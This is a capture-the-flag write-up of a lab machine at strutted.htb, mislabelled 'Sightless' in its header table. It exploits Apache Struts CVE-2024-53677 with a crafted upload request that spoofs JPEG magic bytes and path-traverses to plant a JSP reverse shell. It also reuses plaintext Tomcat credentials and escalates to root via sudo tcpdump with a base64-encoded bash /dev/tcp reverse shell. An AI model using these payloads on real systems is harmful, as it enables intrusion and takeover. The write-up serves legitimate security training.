Machine Info
| Name | Sightless |
|---|---|
| OS | Linux |
| Difficulty | Medium |
| Release Date | 2025-01-23 |
| Completed | 2025-02-16 |
Reconnaissance
nmap
nmap finds 2 open ports; 22/tcp (SSH), and 80/tcp (HTTP).
┌──(kali㉿kali)-[~]
└─$ nmap -p- --min-rate 8000 -sCV 10.10.11.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 15:25 EST
Warning: 10.10.11.59 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.59
Host is up (0.072s latency).
Not shown: 64389 closed tcp ports (reset), 1144 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://strutted.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.86 seconds
Port 22 (SSH) is running OpenSSH. Based on the version detected by nmap, the host is likely running Ubuntu 22.04 Jammy.
Port 80 (HTTP) is running nginx 1.18.0, and returns a redirect to strutted.htb. Based on the HTTP redirect, this hostname can be added to /etc/hosts.
10.10.11.59 strutted.htb
Nginx - Port 80
The site hosted by Nginx on port 80:
The site appears to contain a file upload that accepts image formats. A unique link will be generated for each uploaded image.
Additionally, the site indicates the environment is hosted using Docker, and provides a download link for the Docker image. Following this link downloads a ZIP file that contains the source code and configuration files for the web application.
┌──(kali㉿kali)-[~/Downloads]
└─$ unzip -l strutted.zip
Archive: strutted.zip
Length Date Time Name
--------- ---------- ----- ----
615 2025-01-07 00:59 Dockerfile
4064 2025-01-07 00:59 README.md
1361 2025-01-07 00:59 context.xml
0 2025-01-07 00:59 strutted/
3999 2025-01-07 00:59 strutted/pom.xml
5810 2025-01-07 00:59 strutted/mvnw.cmd
9113 2025-01-07 00:59 strutted/mvnw
0 2025-01-07 00:59 strutted/src/
0 2025-01-07 00:59 strutted/src/main/
0 2025-01-07 00:59 strutted/src/main/webapp/
0 2025-01-07 01:00 strutted/src/main/webapp/WEB-INF/
4303 2025-01-07 01:01 strutted/src/main/webapp/WEB-INF/error.jsp
1117 2025-01-07 00:59 strutted/src/main/webapp/WEB-INF/web.xml
4285 2025-01-07 01:01 strutted/src/main/webapp/WEB-INF/showImage.jsp
5647 2025-01-07 01:11 strutted/src/main/webapp/WEB-INF/upload.jsp
6125 2025-01-07 01:01 strutted/src/main/webapp/WEB-INF/how.jsp
6616 2025-01-07 01:01 strutted/src/main/webapp/WEB-INF/about.jsp
7120 2025-01-07 01:01 strutted/src/main/webapp/WEB-INF/success.jsp
0 2025-01-07 00:59 strutted/src/main/java/
0 2025-01-07 00:59 strutted/src/main/java/org/
0 2025-01-07 00:59 strutted/src/main/java/org/strutted/
0 2025-01-07 01:00 strutted/src/main/java/org/strutted/htb/
6656 2025-01-07 00:59 strutted/src/main/java/org/strutted/htb/Upload.java
1832 2025-01-07 00:59 strutted/src/main/java/org/strutted/htb/URLMapping.java
199 2025-01-07 00:59 strutted/src/main/java/org/strutted/htb/AboutAction.java
1582 2025-01-07 00:59 strutted/src/main/java/org/strutted/htb/DatabaseUtil.java
197 2025-01-07 00:59 strutted/src/main/java/org/strutted/htb/HowAction.java
1146 2025-01-07 00:59 strutted/src/main/java/org/strutted/htb/URLUtil.java
0 2025-01-07 00:59 strutted/src/main/resources/
2145 2025-01-07 01:00 strutted/src/main/resources/struts.xml
0 2025-01-07 00:59 strutted/target/
0 2025-01-07 00:59 strutted/target/generated-sources/
0 2025-01-07 00:59 strutted/target/generated-sources/annotations/
0 2025-01-07 00:59 strutted/target/strutted-1.0.0/
0 2025-01-07 00:59 strutted/target/strutted-1.0.0/META-INF/
0 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/
587 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/error.jsp
1117 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/web.xml
0 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/
794034 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/javassist-3.29.0-GA.jar
14259880 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/sqlite-jdbc-3.47.1.0.jar
632267 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/commons-lang3-3.13.0.jar
264823 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/ognl-3.3.4.jar
95505 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/javax.servlet-api-4.0.1.jar
74132 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/commons-fileupload-1.5.jar
238400 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/commons-text-1.10.0.jar
313296 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/log4j-api-2.20.0.jar
1519233 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/struts2-core-6.3.0.1.jar
1736381 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/freemarker-2.3.32.jar
483954 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/lib/commons-io-2.13.0.jar
0 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/
2315 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/struts.xml
0 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/org/
0 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/
0 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/
454 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/AboutAction.class
3276 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/URLMapping.class
1610 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/URLUtil.class
7344 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/Upload.class
2899 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/DatabaseUtil.class
448 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/classes/org/strutted/htb/HowAction.class
5651 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/upload.jsp
6125 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/how.jsp
6918 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/about.jsp
7120 2025-01-07 00:59 strutted/target/strutted-1.0.0/WEB-INF/success.jsp
0 2025-01-07 00:59 strutted/target/classes/
2315 2025-01-07 00:59 strutted/target/classes/struts.xml
0 2025-01-07 00:59 strutted/target/classes/org/
0 2025-01-07 00:59 strutted/target/classes/org/strutted/
0 2025-01-07 00:59 strutted/target/classes/org/strutted/htb/
454 2025-01-07 00:59 strutted/target/classes/org/strutted/htb/AboutAction.class
3276 2025-01-07 00:59 strutted/target/classes/org/strutted/htb/URLMapping.class
1610 2025-01-07 00:59 strutted/target/classes/org/strutted/htb/URLUtil.class
7344 2025-01-07 00:59 strutted/target/classes/org/strutted/htb/Upload.class
2899 2025-01-07 00:59 strutted/target/classes/org/strutted/htb/DatabaseUtil.class
448 2025-01-07 00:59 strutted/target/classes/org/strutted/htb/HowAction.class
0 2025-01-07 00:59 strutted/target/maven-archiver/
57 2025-01-07 00:59 strutted/target/maven-archiver/pom.properties
19820601 2025-01-07 00:59 strutted/target/strutted-1.0.0.war
0 2025-01-07 00:59 strutted/target/maven-status/
0 2025-01-07 00:59 strutted/target/maven-status/maven-compiler-plugin/
0 2025-01-07 00:59 strutted/target/maven-status/maven-compiler-plugin/compile/
0 2025-01-07 00:59 strutted/target/maven-status/maven-compiler-plugin/compile/default-compile/
199 2025-01-07 00:59 strutted/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
589 2025-01-07 00:59 strutted/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
222 2025-01-07 00:59 tomcat-users.xml
--------- -------
40371715 86 files
There are several notable files included in strutted.zip that reveal what technologies were used to build this web application, as well as the configuration that is possibly used by the instance deployed on strutted.htb. Specifically, README.md provides a high-level overview of the application and its functionality. pom.xml lists the project’s dependencies, which include Apache Struts version 6.3.0.1. tomcat-users.xml indicates the use of Apache Tomcat, and contains the credentials admin:skqKY6360z!Y. DatabaseUtil.java and URLMapping.java include details of the database schema used by the application.
Vulnerability Analysis
Apache Struts
Currently, on the Apache Struts homepage, there is an announcement and security bulletin for CVE-2024-53677 which impacts versions prior to 6.4.0. This vulnerability is a result of flawed file upload logic in which an attacker may manipulate file upload parameters, leading to path traversal, potentially allowing for remote code execution. The Strutted web application appears to be using version 6.3.0.1 and allows for file uploads using the vulnerable FileUploadInterceptor (this can be seen in struts.xml).
A Google search for CVE-2024-53677 returns a proof of concept exploit. The proof of concept includes a reference to a blog post that analyzes this vulnerability and provides several example scenarios. Successful exploitation of this vulnerability would allow an attacker to modify properties of the Struts ValueStack. The ValueStack is used to provide access to action properties. In the context of a file upload action, this would include the filename, allowing for path traversal, resulting in potential remote code execution.
Strutted
In the Strutted application, the vulnerable upload action using FileUploadInterceptor is named “upload”. The configuration of this action is found in struts.xml. The configuration also defines org.strutted.htb.Upload as the class used to handle uploads, and which file extensions are allowed to be uploaded (jpg, jpeg, png, and gif).
<action name="upload" class="org.strutted.htb.Upload">
<interceptor-ref name="fileUpload">
<param name="maximumSize">2097152</param>
<param name="allowedExtensions">jpg,jpeg,png,gif</param>
<param name="message">
Invalid file type! Allowed types: jpg, jpeg, png, gif.
</param>
</interceptor-ref>
<interceptor-ref name="defaultStack" />
<result name="input">WEB-INF/upload.jsp</result>
<result name="error">WEB-INF/error.jsp</result>
<result name="success">WEB-INF/success.jsp</result>
</action>
The Upload class, org.strutted.htb.Upload, contains a several conditions that the uploaded file must match. Specifically, this class checks the content type and magic bytes of the uploaded file. The accepted content types are image/jpeg, image/png, and image/gif. The uploaded file’s magic bytes are checked by reading the first 8 bytes of the file, then checking if they match that of the expected file type.
// JPEG
if (header[0] == (byte)0xFF && header[1] == (byte)0xD8 && header[2] == (byte)0xFF) {
return true;
}
// PNG
if (header[0] == (byte)0x89 && header[1] == (byte)0x50 && header[2] == (byte)0x4E && header[3] == (byte)0x47) {
return true;
}
// GIF (GIF87a or GIF89a)
if (header[0] == (byte)0x47 && header[1] == (byte)0x49 && header[2] == (byte)0x46 &&
header[3] == (byte)0x38 && (header[4] == (byte)0x37 || header[4] == (byte)0x39) && header[5] == (byte)0x61) {
return true;
}
These additional checks prevent directly uploading a JSP shell. However, with a specially crafted upload request, these checks may be bypassed. Using the technique described in the CVE-2024-53677 analysis post and proof of concept exploit, a shell may be written to an arbitrary path, allowing for remote code execution.
Specifying the content type as image/jpeg, should ensure the first file upload condition is met. Including the magic bytes that are checked for jpeg files (FF D8 FF) at the start of the shell payload should meet the second condition. The image upload path is constructed using the following: "uploads/" + timeStamp + "/" + uploadFileName. Using the filename ../../b.jsp should place the shell at the web root, making it accessible at http://strutted.htb/b.jsp.
POST /upload.action HTTP/1.1
Host: strutted.htb
Content-Type: multipart/form-data; boundary=---------------------------11563738178138441912293840439
-----------------------------11563738178138441912293840439
Content-Disposition: form-data; name="Upload"; filename="strutted.jpg"
Content-Type: image/jpeg
ÿØÿ
</usr/share/webshells/jsp/jsp-reverse.jsp>
-----------------------------11563738178138441912293840439
Content-Disposition: form-data; name="top.UploadFileName"
../../b.jsp
-----------------------------11563738178138441912293840439--
Exploitation
Strutted
After capturing a legitimate file upload request using the Burp Suite Proxy, the request can be modified as described in the previous section and sent using the Repeater. The response from the server indicates the shell was successfully uploaded.
The shell is accessible at the expected path: http://strutted.htb/b.jsp. It accepts an IP address and port to connect to, and starts a new bash process.
With nc listening for new connections, the IP address and port can be sent to the server. A connection is received, and the shell appears to be functional. Using id to get the current user and group, it appears the shell is running as tomcat.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.190] from (UNKNOWN) [10.10.11.59] 44498
id
uid=998(tomcat) gid=998(tomcat) groups=998(tomcat)
Privilege Escalation
james
After upgrading the reverse shell, listing the current directory (/var/lib/tomcat9) reveals a config directory (/etc/tomcat9).
tomcat@strutted:~$ pwd
/var/lib/tomcat9
tomcat@strutted:~$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Feb 15 05:27 .
drwxr-xr-x 41 root root 4096 Jan 15 14:30 ..
lrwxrwxrwx 1 root root 12 Jul 20 2022 conf -> /etc/tomcat9
drwxr-xr-x 2 tomcat tomcat 4096 Jan 15 14:30 lib
lrwxrwxrwx 1 root root 17 Jul 20 2022 logs -> ../../log/tomcat9
drwxr-xr-x 2 root root 4096 Feb 15 05:27 policy
drwxrwxr-x 3 tomcat tomcat 4096 Jan 15 14:30 webapps
lrwxrwxrwx 1 root root 19 Jul 20 2022 work -> ../../cache/tomcat9
tomcat@strutted:~$ ls -la /etc/tomcat9
total 220
drwxr-xr-x 4 root root 4096 Jan 15 14:30 .
drwxr-xr-x 107 root root 4096 Jan 21 13:54 ..
drwxrwxr-x 3 root tomcat 4096 Jan 15 14:30 Catalina
-rw-r----- 1 root tomcat 7276 Jan 15 2022 catalina.properties
-rw-r----- 1 root tomcat 1400 Jan 15 2022 context.xml
-rw-r----- 1 root tomcat 1149 Jan 15 2022 jaspic-providers.xml
-rw-r----- 1 root tomcat 2799 Jul 19 2022 logging.properties
drwxr-xr-x 2 root tomcat 4096 Jan 15 14:30 policy.d
-rw-r----- 1 root tomcat 7606 Jan 7 10:40 server.xml
-rw-r----- 1 root tomcat 2902 Jan 11 13:49 tomcat-users.xml
-rw-r----- 1 root tomcat 172359 Jan 15 2022 web.xml
The most notable file in the config directory is tomcat-users.xml. The majority of this file is commented out, including a password for the admin user (admin:IT14d6SSP81k). This password is different from the one found in the sample tomcat-users.xml file.
...
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
...
<!--
<user username="admin" password="<must-be-changed>" roles="manager-gui"/>
<user username="robot" password="<must-be-changed>" roles="manager-script"/>
<role rolename="manager-gui"/>
<role rolename="admin-gui"/>
<user username="admin" password="IT14d6SSP81k" roles="manager-gui,admin-gui"/>
--->
...
</tomcat-users>
Listing the contents of /etc/passwd, there does not appear to be a user with the name admin. However, there are 3 non-standard users. tomcat is the current user, which is configured with a home directory of /var/lib/tomcat9, and no login shell. james has the name Network Administrator, a home directory of /home/james, and a login shell of /bin/bash. _laurel is configured with a home directory of /var/log/laurel and no login shell.
tomcat:x:998:998:Apache Tomcat:/var/lib/tomcat9:/usr/sbin/nologin
james:x:1000:1000:Network Administrator:/home/james:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
james appears to be the only user with a home directory in /home. This directory is not readable as the user, tomcat.
tomcat@strutted:~$ ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Jan 15 14:30 .
drwxr-xr-x 18 root root 4096 Jan 15 14:30 ..
drwxr-x--- 3 james james 4096 Jan 15 15:36 james
/var/log/laurel appears to contain several log files. These are only readable and writable by _laurel.
tomcat@strutted:~$ ls -la /var/log/laurel
total 71624
drwxr-xr-x 2 _laurel _laurel 4096 Feb 16 17:24 .
drwxrwxr-x 12 root syslog 4096 Feb 16 00:00 ..
-rw-------+ 1 _laurel _laurel 3271903 Feb 16 19:57 audit.log
-rw-------+ 1 _laurel _laurel 5000697 Feb 16 17:24 audit.log.1
-rw-------+ 1 _laurel _laurel 5000778 Feb 15 07:01 audit.log.10
-rw-------+ 1 _laurel _laurel 5000235 Jan 21 13:54 audit.log.11
-rw-------+ 1 _laurel _laurel 5000383 Jan 21 13:54 audit.log.12
-rw-------+ 1 _laurel _laurel 5000302 Jan 21 13:54 audit.log.13
-rw-------+ 1 _laurel _laurel 5000603 Jan 21 13:54 audit.log.14
-rw-------+ 1 _laurel _laurel 5000690 Feb 16 13:28 audit.log.2
-rw-------+ 1 _laurel _laurel 5000215 Feb 16 09:35 audit.log.3
-rw-------+ 1 _laurel _laurel 5000540 Feb 16 05:41 audit.log.4
-rw-------+ 1 _laurel _laurel 5000614 Feb 16 01:45 audit.log.5
-rw-------+ 1 _laurel _laurel 5000241 Feb 15 22:15 audit.log.6
-rw-------+ 1 _laurel _laurel 5000903 Feb 15 18:22 audit.log.7
-rw-------+ 1 _laurel _laurel 5000569 Feb 15 14:50 audit.log.8
-rw-------+ 1 _laurel _laurel 5000596 Feb 15 10:55 audit.log.9
Attempting to use the password from tomcat-users.xml to su to james is not successful.
tomcat@strutted:~$ su - james
Password:
su: Authentication failure
As previously identified, the server is running OpenSSH. Attempting to authenticate as james:IT14d6SSP81k via SSH is successful. Running id, james is listed as a member of the sudo group.
┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
...
[email protected]'s password:
...
james@strutted:~$ id
uid=1000(james) gid=1000(james) groups=1000(james),27(sudo)
Listing the home directory of james reveals user.txt. This file contains the user flag.
james@strutted:~$ ls -la
total 28
drwxr-x--- 3 james james 4096 Jan 15 15:36 .
drwxr-xr-x 3 root root 4096 Jan 15 14:30 ..
lrwxrwxrwx 1 root root 9 Jan 11 13:50 .bash_history -> /dev/null
-rw-r--r-- 1 james james 220 Jan 11 13:07 .bash_logout
-rw-r--r-- 1 james james 3771 Jan 11 13:07 .bashrc
drwx------ 2 james james 4096 Jan 15 15:24 .cache
-rw-r--r-- 1 james james 807 Jan 11 13:07 .profile
-rw-r----- 1 root james 33 Feb 15 05:32 user.txt
james@strutted:~$
james@strutted:~$ cat user.txt
837290**************************
root
As previously identified, james is a member of the sudo group. sudo -l is used to identify what commands james may run with elevated privileges.
james@strutted:~$ sudo -l
Matching Defaults entries for james on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User james may run the following commands on localhost:
(ALL) NOPASSWD: /usr/sbin/tcpdump
james is only permitted to run tcpdump with elevated privileges. A quick search for tcpdump on GTFOBins reveals that when tcpdump is permitted to run with sudo, it may be used to maintain elevated privileges. Using this technique, a base64 encoded reverse shell can be sent back to a nc listener.
james@strutted:~$ COMMAND='echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xOTAvOTAwMiAwPiYx | base64 -d | bash'
james@strutted:~$ TF=$(mktemp)
james@strutted:~$ echo "$COMMAND" > $TF
james@strutted:~$ chmod +x $TF
james@strutted:~$ sudo tcpdump -ln -i lo -w /dev/null -W1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Maximum file limit reached: 1
1 packet captured
4 packets received by filter
0 packets dropped by kernel
The reverse shell as root is successful.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9002
listening on [any] 9002 ...
connect to [10.10.14.190] from (UNKNOWN) [10.10.11.59] 54292
bash: cannot set terminal process group (2943): Inappropriate ioctl for device
bash: no job control in this shell
root@strutted:/home/james# id
id
uid=0(root) gid=0(root) groups=0(root)
Listing the directory /root reveals root.txt. This file contains the root flag.
root@strutted:~# ls -la
ls -la
total 32
drwx------ 5 root root 4096 Feb 15 05:32 .
drwxr-xr-x 18 root root 4096 Jan 15 14:30 ..
lrwxrwxrwx 1 root root 9 Apr 27 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc
drwx------ 2 root root 4096 Jan 16 10:55 .cache
drwxr-xr-x 3 root root 4096 Jan 16 10:55 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r----- 1 root root 33 Feb 15 05:32 root.txt
drwx------ 2 root root 4096 Jan 15 14:30 .ssh
root@strutted:~#
root@strutted:~# cat root.txt
cat root.txt
26d907**************************